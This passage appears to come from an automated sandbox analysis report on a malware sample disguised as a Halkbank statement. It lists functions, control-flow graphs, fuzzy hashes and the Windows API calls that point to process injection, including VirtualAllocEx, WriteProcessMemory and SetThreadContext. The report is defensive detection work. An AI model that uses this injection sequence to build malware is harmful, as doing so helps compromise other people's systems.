                                                              Function 02700D84 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 2700d84-2700e25 370 2700e27-2700e31 367->370 371 2700e5e-2700e7e 367->371 370->371 372 2700e33-2700e35 370->372 378 2700e80-2700e8a 371->378 379 2700eb7-2700ee6 371->379 373 2700e37-2700e41 372->373 374 2700e58-2700e5b 372->374 376 2700e43 373->376 377 2700e45-2700e54 373->377 374->371 376->377 377->377 380 2700e56 377->380 378->379 381 2700e8c-2700e8e 378->381 385 2700ee8-2700ef2 379->385 386 2700f1f-2700fd9 CreateProcessA 379->386 380->374 383 2700e90-2700e9a 381->383 384 2700eb1-2700eb4 381->384 387 2700e9c 383->387 388 2700e9e-2700ead 383->388 384->379 385->386 389 2700ef4-2700ef6 385->389 399 2700fe2-2701068 386->399 400 2700fdb-2700fe1 386->400 387->388 388->388 390 2700eaf 388->390 391 2700ef8-2700f02 389->391 392 2700f19-2700f1c 389->392 390->384 394 2700f04 391->394 395 2700f06-2700f15 391->395 392->386 394->395 395->395 396 2700f17 395->396 396->392 410 2701078-270107c 399->410 411 270106a-270106e 399->411 400->399 413 270108c-2701090 410->413 414 270107e-2701082 410->414 411->410 412 2701070 411->412 412->410 416 27010a0-27010a4 413->416 417 2701092-2701096 413->417 414->413 415 2701084 414->415 415->413 419 27010b6-27010bd 416->419 420 27010a6-27010ac 416->420 417->416 418 2701098 417->418 418->416 421 27010d4 419->421 422 27010bf-27010ce 419->422 420->419 424 27010d5 421->424 422->421 424->424
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02700FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1982d7081d7f3d4b075213df36d142c79ab544c1904804640bfa85cba896bb7b
                                                              • Instruction ID: 838c6c1b88b0b5853801f8fdd688e75cecdbe72ac265af4580982f8df54197c2
                                                              • Opcode Fuzzy Hash: 1982d7081d7f3d4b075213df36d142c79ab544c1904804640bfa85cba896bb7b
                                                              • Instruction Fuzzy Hash: FFA14B71D00259CFDB24DF68C881BEEBBF2BF45314F1485A9D849A7280DB74A989CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700D90 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 425 2700d90-2700e25 427 2700e27-2700e31 425->427 428 2700e5e-2700e7e 425->428 427->428 429 2700e33-2700e35 427->429 435 2700e80-2700e8a 428->435 436 2700eb7-2700ee6 428->436 430 2700e37-2700e41 429->430 431 2700e58-2700e5b 429->431 433 2700e43 430->433 434 2700e45-2700e54 430->434 431->428 433->434 434->434 437 2700e56 434->437 435->436 438 2700e8c-2700e8e 435->438 442 2700ee8-2700ef2 436->442 443 2700f1f-2700fd9 CreateProcessA 436->443 437->431 440 2700e90-2700e9a 438->440 441 2700eb1-2700eb4 438->441 444 2700e9c 440->444 445 2700e9e-2700ead 440->445 441->436 442->443 446 2700ef4-2700ef6 442->446 456 2700fe2-2701068 443->456 457 2700fdb-2700fe1 443->457 444->445 445->445 447 2700eaf 445->447 448 2700ef8-2700f02 446->448 449 2700f19-2700f1c 446->449 447->441 451 2700f04 448->451 452 2700f06-2700f15 448->452 449->443 451->452 452->452 453 2700f17 452->453 453->449 467 2701078-270107c 456->467 468 270106a-270106e 456->468 457->456 470 270108c-2701090 467->470 471 270107e-2701082 467->471 468->467 469 2701070 468->469 469->467 473 27010a0-27010a4 470->473 474 2701092-2701096 470->474 471->470 472 2701084 471->472 472->470 476 27010b6-27010bd 473->476 477 27010a6-27010ac 473->477 474->473 475 2701098 474->475 475->473 478 27010d4 476->478 479 27010bf-27010ce 476->479 477->476 481 27010d5 478->481 479->478 481->481
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02700FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 10408097921c4fa07163733187250e1fe104008025f91fbc2bc485bf8164d165
                                                              • Instruction ID: bd1a16d8f8c47f86f0296487e83196f3e0e9e159b11c79ed17c204b15bcbd114
                                                              • Opcode Fuzzy Hash: 10408097921c4fa07163733187250e1fe104008025f91fbc2bc485bf8164d165
                                                              • Instruction Fuzzy Hash: 4C912A71D00259CFDB24DF68C881BDEBBF2BF45314F148569D849A7280DB74A989CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255ADC8 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 482 255adc8-255add7 483 255ae03-255ae07 482->483 484 255add9-255ade6 call 2559740 482->484 485 255ae09-255ae13 483->485 486 255ae1b-255ae5c 483->486 491 255adfc 484->491 492 255ade8 484->492 485->486 493 255ae5e-255ae66 486->493 494 255ae69-255ae77 486->494 491->483 542 255adee call 255b051 492->542 543 255adee call 255b060 492->543 493->494 496 255ae79-255ae7e 494->496 497 255ae9b-255ae9d 494->497 495 255adf4-255adf6 495->491 498 255af38-255af4f 495->498 500 255ae80-255ae87 call 255a110 496->500 501 255ae89 496->501 499 255aea0-255aea7 497->499 515 255af51-255afb0 498->515 503 255aeb4-255aebb 499->503 504 255aea9-255aeb1 499->504 502 255ae8b-255ae99 500->502 501->502 502->499 506 255aebd-255aec5 503->506 507 255aec8-255aed1 call 255a120 503->507 504->503 506->507 513 255aed3-255aedb 507->513 514 255aede-255aee3 507->514 513->514 516 255aee5-255aeec 514->516 517 255af01-255af0e 514->517 533 255afb2 515->533 516->517 518 255aeee-255aefe call 255a130 call 255a140 516->518 523 255af31-255af37 517->523 524 255af10-255af2e 517->524 518->517 524->523 534 255afb4 533->534 535 255afb6-255afde 533->535 534->535 536 255afe0-255aff8 534->536 535->536 537 255b000-255b02b GetModuleHandleW 536->537 538 255affa-255affd 536->538 539 255b034-255b048 537->539 540 255b02d-255b033 537->540 538->537 540->539 542->495 543->495
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0255B01E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: a573d6cebef9f0a720c471b05378c517001f61a636dda72d739366e667ac0bbf
                                                              • Instruction ID: 3eaac7b3130b8ea875261785cde9c5d56ddae7673255e9fd177837c8158431b6
                                                              • Opcode Fuzzy Hash: a573d6cebef9f0a720c471b05378c517001f61a636dda72d739366e667ac0bbf
                                                              • Instruction Fuzzy Hash: F6813770A00B158FDB24DF69D06475ABBF2FF88304F008A2ED88AD7A50D775E949CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255590D Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 544 255590d-255590e 545 2555910-2555911 544->545 546 2555912 544->546 545->546 547 2555914-2555915 546->547 548 2555916-255598c 546->548 547->548 550 255598f-25559d9 CreateActCtxA 548->550 552 25559e2-2555a3c 550->552 553 25559db-25559e1 550->553 560 2555a3e-2555a41 552->560 561 2555a4b-2555a4f 552->561 553->552 560->561 562 2555a51-2555a5d 561->562 563 2555a60 561->563 562->563 565 2555a61 563->565 565->565
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 025559C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: caf3648a72726ca9ae34e4e7848ab02e90942a505a2634453ffeaa8b5d13ba19
                                                              • Instruction ID: 3f542ce433a2ee110e5bda42fd45fe7f4352608394fd8d328552f6d6cd6e27df
                                                              • Opcode Fuzzy Hash: caf3648a72726ca9ae34e4e7848ab02e90942a505a2634453ffeaa8b5d13ba19
                                                              • Instruction Fuzzy Hash: 7441E3B0C00629CBDB24CFA9C8847DDBBB5BF45304F60806AD409AB251DB756949CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 025544D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 566 25544d4-25559d9 CreateActCtxA 570 25559e2-2555a3c 566->570 571 25559db-25559e1 566->571 578 2555a3e-2555a41 570->578 579 2555a4b-2555a4f 570->579 571->570 578->579 580 2555a51-2555a5d 579->580 581 2555a60 579->581 580->581 583 2555a61 581->583 583->583
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 025559C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 8a81fe1b118907942e7d059d482ed29f916a80915a9aa51b03b7a5dfe6e263aa
                                                              • Instruction ID: c219fa788554be2852e8cee5b94c783908b4759faad0ebde7c27b58868b3ca69
                                                              • Opcode Fuzzy Hash: 8a81fe1b118907942e7d059d482ed29f916a80915a9aa51b03b7a5dfe6e263aa
                                                              • Instruction Fuzzy Hash: F641B3B0D0062DCBDB24DFA9C88479DBBB5BF45304F60806AD409AB251DB756949CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02555A84 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 584 2555a84-2555a90 585 2555a42-2555a44 584->585 586 2555a92-2555b14 584->586 587 2555a46 585->587 588 2555a48-2555a4a 585->588 587->588 590 2555a4b-2555a4f 588->590 591 2555a51-2555a5d 590->591 592 2555a60 590->592 591->592 594 2555a61 592->594 594->594
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6eec5bd3fc62dc193a70517c9caadb4a313016afd451f30ba264ba0e5e04715
                                                              • Instruction ID: 150feda3f578adb47387572444aa602ce188bab7ecba6bd1749ca2da865366bf
                                                              • Opcode Fuzzy Hash: c6eec5bd3fc62dc193a70517c9caadb4a313016afd451f30ba264ba0e5e04715
                                                              • Instruction Fuzzy Hash: 0E31BEB1C04769CEDB11CFA8C4647EDBFF1BF46318F94408AD801AB251E779694ACB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700B00 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 595 2700b00-2700b56 598 2700b66-2700ba5 WriteProcessMemory 595->598 599 2700b58-2700b64 595->599 601 2700ba7-2700bad 598->601 602 2700bae-2700bde 598->602 599->598 601->602
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02700B98
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: ec50bc094ca3f22810b91b94d61205883232a740cb318c83b0c31edcb135b562
                                                              • Instruction ID: 97fc8b2f52e08727c4b33be6069d26de100ef78f6308d4ae5b47883e28a0b2ca
                                                              • Opcode Fuzzy Hash: ec50bc094ca3f22810b91b94d61205883232a740cb318c83b0c31edcb135b562
                                                              • Instruction Fuzzy Hash: 94216875D003099FCB10CFA9C985BDEBBF4FF88324F10842AE919A3240D7789945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700B08 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 606 2700b08-2700b56 608 2700b66-2700ba5 WriteProcessMemory 606->608 609 2700b58-2700b64 606->609 611 2700ba7-2700bad 608->611 612 2700bae-2700bde 608->612 609->608 611->612
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02700B98
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 9fabf2353d51c443d2260379b9cee3ea1b9755e24cab04d5a8d37c72f1d76ead
                                                              • Instruction ID: 91aa9ac40dee847ddd593ee30e7affc5f194ad6516fa423fbd83c857a8a03b6a
                                                              • Opcode Fuzzy Hash: 9fabf2353d51c443d2260379b9cee3ea1b9755e24cab04d5a8d37c72f1d76ead
                                                              • Instruction Fuzzy Hash: F42124B5D003099FCB10CFA9C885BDEBBF5FF88324F10842AE919A7240D7789955CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700969 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 616 2700969-27009bb 619 27009cb-27009fb Wow64SetThreadContext 616->619 620 27009bd-27009c9 616->620 622 2700a04-2700a34 619->622 623 27009fd-2700a03 619->623 620->619 623->622
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027009EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 98102e0a7388b8d11ee0107a34956d9554f5bdcb309ebd7f3c3c77c534c7331e
                                                              • Instruction ID: 72dbed7579af2cb6957de12bc24920059ec073cc33084df3bee1ea2c1fafea3d
                                                              • Opcode Fuzzy Hash: 98102e0a7388b8d11ee0107a34956d9554f5bdcb309ebd7f3c3c77c534c7331e
                                                              • Instruction Fuzzy Hash: 122128B5D002498FDB10DFAAC4857EEBBF4AF88324F148429D559A7241CB78A945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700BF0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 627 2700bf0-2700c85 ReadProcessMemory 630 2700c87-2700c8d 627->630 631 2700c8e-2700cbe 627->631 630->631
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02700C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: b0bfd260a29e4ca13e1aafb36dd108320ddfd68d1b365842c5e479e9d16501f1
                                                              • Instruction ID: 40ab6ca72052101fede7c45983bfd350421e4d0ee387cd7714d1a21c973a9228
                                                              • Opcode Fuzzy Hash: b0bfd260a29e4ca13e1aafb36dd108320ddfd68d1b365842c5e479e9d16501f1
                                                              • Instruction Fuzzy Hash: 4B2148B1D012499FCB10CFA9C985BEEBFF5FF88320F10842AE959A7250C7349945DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700BF8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02700C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 3200fa905d4da7597af37a5fbdeec786d7aee4db30179229eefed15bba2f18c0
                                                              • Instruction ID: b3d2f879a6f526a823ef4c6a2a19ae50b7fa8ed4b93a3514da535c36a4730054
                                                              • Opcode Fuzzy Hash: 3200fa905d4da7597af37a5fbdeec786d7aee4db30179229eefed15bba2f18c0
                                                              • Instruction Fuzzy Hash: F12128B1D003499FCB10DFAAC885ADEFBF5FF88320F108429E519A7250C7349945DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700970 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 635 2700970-27009bb 637 27009cb-27009fb Wow64SetThreadContext 635->637 638 27009bd-27009c9 635->638 640 2700a04-2700a34 637->640 641 27009fd-2700a03 637->641 638->637 641->640
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027009EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 352153855f43baa7fec0ae83079ab509c3ddedf7b2472136fed0098189edad1c
                                                              • Instruction ID: 612db2b36cea147f05e9ee225e7a6bd713fec65356ce6da1fe9234816d932bbb
                                                              • Opcode Fuzzy Hash: 352153855f43baa7fec0ae83079ab509c3ddedf7b2472136fed0098189edad1c
                                                              • Instruction Fuzzy Hash: A82107B1D102098FDB10DFAAC4857AEBBF4EB88324F148429D559A7241C7789945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255D6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255D737
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a8620065c4fdc9ec9649cb6c3d6117378f12440e73a4e58b24975324262ef89e
                                                              • Instruction ID: c0f791d113e5667ff3e07050cdde66143432b41d0a9bc00b59de63626332fa0c
                                                              • Opcode Fuzzy Hash: a8620065c4fdc9ec9649cb6c3d6117378f12440e73a4e58b24975324262ef89e
                                                              • Instruction Fuzzy Hash: 5421E0B5D01259DFDB10CFAAD984ADEBBF8FB48310F14801AE918A3310C374AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255D6A8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255D737
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 36372fbc5369db5ee393ea3e672b30aec5809e94e433298f4226ece857ad33f2
                                                              • Instruction ID: d9085e3aafc98c41928fb3ee115116d5d907974dca1397567bb2d56893da3d15
                                                              • Opcode Fuzzy Hash: 36372fbc5369db5ee393ea3e672b30aec5809e94e433298f4226ece857ad33f2
                                                              • Instruction Fuzzy Hash: 4C21F2B5D00249DFDB00CFA9D584AEEBFF5FB48310F14801AE958A3210C378AA41CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700A41 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02700AB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 498caa7973dc0b71677ed7586ff19b5696a3f52930f1a30061ed523889bf05ad
                                                              • Instruction ID: bed5bd67cc57b4e0ddfdb3d0fd9e70f01d8d322892f841f696e4b8c2c6e68c9d
                                                              • Opcode Fuzzy Hash: 498caa7973dc0b71677ed7586ff19b5696a3f52930f1a30061ed523889bf05ad
                                                              • Instruction Fuzzy Hash: 12118971D002499FCB10DFAAC845BDFBFF5EF88324F248419E519A7250CB35A945DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255B238 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255B099,00000800,00000000,00000000), ref: 0255B2AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: d9f63b2b75c09a258c1c0e860d6dcb39d769f7b10c9181c4a535955b4c1b9ebb
                                                              • Instruction ID: bf8595cd14b099290125f210ae9755a5ad6c51016dbaed38889cc5a58408864b
                                                              • Opcode Fuzzy Hash: d9f63b2b75c09a258c1c0e860d6dcb39d769f7b10c9181c4a535955b4c1b9ebb
                                                              • Instruction Fuzzy Hash: 1E2124B6D003498FDB14CF9AD448AEEBFF4BB48314F14801AD869A7600C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255B099,00000800,00000000,00000000), ref: 0255B2AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: a803a64f39315d01d447c9e9a3fa383697bf377258e0e384bebc83c843b7fb6c
                                                              • Instruction ID: e1eddc0d89d2cc93641925ffe4142c17902c0ff6a94570c1e767583d368b4706
                                                              • Opcode Fuzzy Hash: a803a64f39315d01d447c9e9a3fa383697bf377258e0e384bebc83c843b7fb6c
                                                              • Instruction Fuzzy Hash: C91114B6D003199FCB10CF9AD448ADEFBF4FB88314F14842AE819A7600C375A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027008B9 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: cfe5dcdab4503542b33388b0eec692526bb5828d2ef9f5cb08ba26da516b1aa5
                                                              • Instruction ID: 8a6137f43cddc89ce0ccc14b2d921b19341b12b8fe8745f44a3dbef22d172bce
                                                              • Opcode Fuzzy Hash: cfe5dcdab4503542b33388b0eec692526bb5828d2ef9f5cb08ba26da516b1aa5
                                                              • Instruction Fuzzy Hash: 721143B5D003498BDB20DFAAD4457EFFBF8AB88324F20841AD459A7240CB35A945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700A48 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02700AB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 25ad98b10db42cc92efdd589213a965097db31ee165d5809d1236b044dc101b5
                                                              • Instruction ID: d85625264ead0e62e125f458ef8b180a220d81167d9163c4b619fd6751acd844
                                                              • Opcode Fuzzy Hash: 25ad98b10db42cc92efdd589213a965097db31ee165d5809d1236b044dc101b5
                                                              • Instruction Fuzzy Hash: 541123B6D002499FCB10DFAAC845ADFBFF5EB88324F248419E519A7250CB75A944CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02705171 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 027051D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: f68fec016996bab61e849e414155b8e1cc7872ea6b5c934684a6c22ef7d3b935
                                                              • Instruction ID: 3c21ec78fc9463e101b6f542631aeb53783061b79e1aaf6efe462d6048ad3d98
